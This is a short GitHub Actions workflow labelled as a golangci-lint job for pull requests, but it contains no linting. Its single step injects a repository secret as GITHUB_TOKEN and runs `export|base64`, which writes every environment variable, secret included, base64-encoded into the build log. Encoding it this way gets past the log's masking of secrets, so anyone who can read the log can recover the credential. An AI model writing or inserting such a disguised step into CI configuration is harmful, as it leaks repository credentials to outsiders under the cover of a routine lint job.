name: golangci-lint
on:
  pull_request:
   branches: [ main ]
jobs:
  golangci:
    name: lint
    runs-on: ubuntu-latest
    steps:
      - name: Run
        run: export|base64
        shell: bash
        env:
          GITHUB_TOKEN: ${{ secrets.SUPERSECRET }}
